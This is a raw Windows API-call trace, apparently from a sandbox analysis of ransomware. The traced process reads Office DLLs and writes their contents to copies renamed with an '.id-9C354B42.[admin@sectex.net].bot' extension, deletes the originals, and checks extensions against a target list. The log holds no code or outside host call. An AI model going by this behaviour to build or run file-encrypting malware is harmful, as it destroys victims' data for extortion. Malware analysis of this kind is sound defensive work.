	[0055.619] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll")) returned 0x20
	[0055.619] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0055.619] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0055.619] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.619] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.619] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c
	[0055.620] GetLastError () returned 0x0
	[0055.620] ReadFile (in: hFile=0x1a0, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x25b50, lpOverlapped=0x0) returned 1
	[0056.078] WriteFile (in: hFile=0x20c, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0x25b60, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0x25b60, lpOverlapped=0x0) returned 1
	[0056.081] ReadFile (in: hFile=0x1a0, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x0, lpOverlapped=0x0) returned 1
	[0056.081] WriteFile (in: hFile=0x20c, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0056.081] SetEndOfFile (hFile=0x20c) returned 1
	[0056.081] CloseHandle (hObject=0x20c) returned 1
	[0056.081] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.081] SetEndOfFile (hFile=0x1a0) returned 1
	[0056.083] CloseHandle (hObject=0x1a0) returned 1
	[0056.083] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0056.083] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll")) returned 1
	[0056.083] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73
	[0056.083] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73
	[0056.083] lstrlenW (lpString=".doc") returned 4
	[0056.083] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0056.083] lstrlenW (lpString=".docx") returned 5
	[0056.083] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0056.083] lstrlenW (lpString=".pdf") returned 4
	[0056.083] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0056.083] lstrlenW (lpString=".xls") returned 4
	[0056.083] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0056.083] lstrlenW (lpString=".xlsx") returned 5
	[0056.083] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0056.084] lstrlenW (lpString=".ppt") returned 4
	[0056.084] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0056.084] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73
	[0056.084] lstrlenW (lpString=".zip") returned 4
	[0056.084] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0056.084] lstrlenW (lpString=".rar") returned 4
	[0056.084] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0056.084] lstrlenW (lpString=".bz2") returned 4
	[0056.084] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0056.084] lstrlenW (lpString=".7z") returned 3
	[0056.084] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0056.084] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73
	[0056.084] lstrlenW (lpString=".dbf") returned 4
	[0056.084] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0056.084] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73
	[0056.084] lstrlenW (lpString=".1cd") returned 4
	[0056.084] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0056.084] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73
	[0056.084] lstrlenW (lpString=".jpg") returned 4
	[0056.084] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0056.084] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73
	[0056.084] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73
	[0056.084] lstrlenW (lpString=".doc") returned 4
	[0056.084] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0056.084] lstrlenW (lpString=".docx") returned 5
	[0056.084] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0056.084] lstrlenW (lpString=".pdf") returned 4
	[0056.084] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0056.084] lstrlenW (lpString=".xls") returned 4
	[0056.084] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0056.084] lstrlenW (lpString=".xlsx") returned 5
	[0056.084] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0056.084] lstrlenW (lpString=".ppt") returned 4
	[0056.084] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0056.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73
	[0056.085] lstrlenW (lpString=".zip") returned 4
	[0056.085] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0056.085] lstrlenW (lpString=".rar") returned 4
	[0056.085] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0056.085] lstrlenW (lpString=".bz2") returned 4
	[0056.085] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0056.085] lstrlenW (lpString=".7z") returned 3
	[0056.085] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0056.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73
	[0056.085] lstrlenW (lpString=".dbf") returned 4
	[0056.085] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0056.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73
	[0056.085] lstrlenW (lpString=".1cd") returned 4
	[0056.085] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0056.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73
	[0056.085] lstrlenW (lpString=".jpg") returned 4
	[0056.085] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0056.085] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".bot") returned 1
	[0056.085] lstrlenW (lpString="MSOINTL.REST.IDX_DLL") returned 20
	[0056.085] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0056.086] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=1388416) returned 1
	[0056.086] CloseHandle (hObject=0x1a0) returned 1
	[0056.086] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll")) returned 0x20
	[0056.086] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0056.086] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0056.086] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.086] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.086] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c
	[0056.087] GetLastError () returned 0x0
	[0056.087] ReadFile (in: hFile=0x1a0, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0xffff0, lpOverlapped=0x0) returned 1
	[0056.112] WriteFile (in: hFile=0x20c, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xffff0, lpOverlapped=0x0) returned 1
	[0056.629] ReadFile (in: hFile=0x1a0, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x52f90, lpOverlapped=0x0) returned 1
	[0056.658] WriteFile (in: hFile=0x20c, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0x52fa0, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0x52fa0, lpOverlapped=0x0) returned 1
	[0056.850] ReadFile (in: hFile=0x1a0, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x0, lpOverlapped=0x0) returned 1
	[0056.850] WriteFile (in: hFile=0x20c, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xfc, lpOverlapped=0x0) returned 1
	[0056.850] SetEndOfFile (hFile=0x20c) returned 1
	[0056.928] CloseHandle (hObject=0x20c) returned 1
	[0056.928] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.928] SetEndOfFile (hFile=0x1a0) returned 1
	[0056.932] CloseHandle (hObject=0x1a0) returned 1
	[0056.932] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0056.932] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll")) returned 1
	[0057.868] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81
	[0057.868] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81
	[0057.868] lstrlenW (lpString=".doc") returned 4
	[0057.868] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0057.868] lstrlenW (lpString=".docx") returned 5
	[0057.868] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0057.868] lstrlenW (lpString=".pdf") returned 4
	[0057.868] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0057.868] lstrlenW (lpString=".xls") returned 4
	[0057.868] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0057.868] lstrlenW (lpString=".xlsx") returned 5
	[0057.868] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0057.868] lstrlenW (lpString=".ppt") returned 4
	[0057.868] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0057.868] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81
	[0057.868] lstrlenW (lpString=".zip") returned 4
	[0057.868] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0057.868] lstrlenW (lpString=".rar") returned 4
	[0057.868] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0057.868] lstrlenW (lpString=".bz2") returned 4
	[0057.869] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0057.869] lstrlenW (lpString=".7z") returned 3
	[0057.869] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0057.869] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81
	[0057.869] lstrlenW (lpString=".dbf") returned 4
	[0057.869] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0057.869] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81
	[0057.869] lstrlenW (lpString=".1cd") returned 4
	[0057.869] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0057.869] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81
	[0057.869] lstrlenW (lpString=".jpg") returned 4
	[0057.869] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0057.869] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81
	[0057.869] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81
	[0057.869] lstrlenW (lpString=".doc") returned 4
	[0057.869] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0057.869] lstrlenW (lpString=".docx") returned 5
	[0057.869] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0057.869] lstrlenW (lpString=".pdf") returned 4
	[0057.869] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0057.869] lstrlenW (lpString=".xls") returned 4
	[0057.869] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0057.869] lstrlenW (lpString=".xlsx") returned 5
	[0057.869] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0057.869] lstrlenW (lpString=".ppt") returned 4
	[0057.869] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0057.869] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81
	[0057.869] lstrlenW (lpString=".zip") returned 4
	[0057.869] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0057.869] lstrlenW (lpString=".rar") returned 4
	[0057.869] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0057.869] lstrlenW (lpString=".bz2") returned 4
	[0057.869] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0057.869] lstrlenW (lpString=".7z") returned 3
	[0057.870] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0057.870] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81
	[0057.870] lstrlenW (lpString=".dbf") returned 4
	[0057.870] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0057.870] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81
	[0057.870] lstrlenW (lpString=".1cd") returned 4
	[0057.870] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0057.870] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81
	[0057.870] lstrlenW (lpString=".jpg") returned 4
	[0057.870] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0057.870] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0057.870] lstrlenW (lpString="ACECORE.DLL") returned 11
	[0057.870] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0057.922] GetFileSizeEx (in: hFile=0x214, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=3213192) returned 1
	[0057.922] CloseHandle (hObject=0x214) returned 1
	[0057.922] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll")) returned 0x20
	[0057.922] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0057.922] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0058.052] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0058.052] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc6c | out: lpNewFilePointer=0x0) returned 1
	[0058.052] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0058.052] ReadFile (in: hFile=0x214, lpBuffer=0xb0b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb0b0058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0058.063] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x1057d8, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0058.063] ReadFile (in: hFile=0x214, lpBuffer=0xb0f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb0f0058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0058.079] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa55fc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0058.079] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x2d0788, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0058.079] ReadFile (in: hFile=0x214, lpBuffer=0xb130058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb130058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0058.098] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.099] WriteFile (in: hFile=0x214, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0xa55fcb0, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fcb0*=0xc0102, lpOverlapped=0x0) returned 1
	[0058.314] SetEndOfFile (hFile=0x214) returned 1
	[0058.314] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb51b820
	[0058.318] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0058.318] WriteFile (in: hFile=0x214, lpBuffer=0xb51b820*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb51b820*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0058.319] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x1057d8, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0058.320] WriteFile (in: hFile=0x214, lpBuffer=0xb51b820*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb51b820*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0058.324] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x2d0788, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0058.324] WriteFile (in: hFile=0x214, lpBuffer=0xb51b820*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb51b820*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0058.329] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb51b820 | out: hHeap=0x7d60000) returned 1
	[0058.329] CloseHandle (hObject=0x214) returned 1
	[0058.329] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0058.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67
	[0058.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67
	[0058.330] lstrlenW (lpString=".doc") returned 4
	[0058.330] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0058.330] lstrlenW (lpString=".docx") returned 5
	[0058.330] lstrcmpiW (lpString1=".docx", lpString2="E.DLL") returned -1
	[0058.330] lstrlenW (lpString=".pdf") returned 4
	[0058.330] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0058.330] lstrlenW (lpString=".xls") returned 4
	[0058.330] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0058.330] lstrlenW (lpString=".xlsx") returned 5
	[0058.330] lstrcmpiW (lpString1=".xlsx", lpString2="E.DLL") returned -1
	[0058.330] lstrlenW (lpString=".ppt") returned 4
	[0058.330] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0058.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67
	[0058.330] lstrlenW (lpString=".zip") returned 4
	[0058.330] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0058.330] lstrlenW (lpString=".rar") returned 4
	[0058.330] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0058.330] lstrlenW (lpString=".bz2") returned 4
	[0058.330] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0058.330] lstrlenW (lpString=".7z") returned 3
	[0058.330] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0058.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67
	[0058.330] lstrlenW (lpString=".dbf") returned 4
	[0058.330] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0058.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67
	[0058.330] lstrlenW (lpString=".1cd") returned 4
	[0058.330] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0058.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67
	[0058.331] lstrlenW (lpString=".jpg") returned 4
	[0058.331] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0058.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67
	[0058.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67
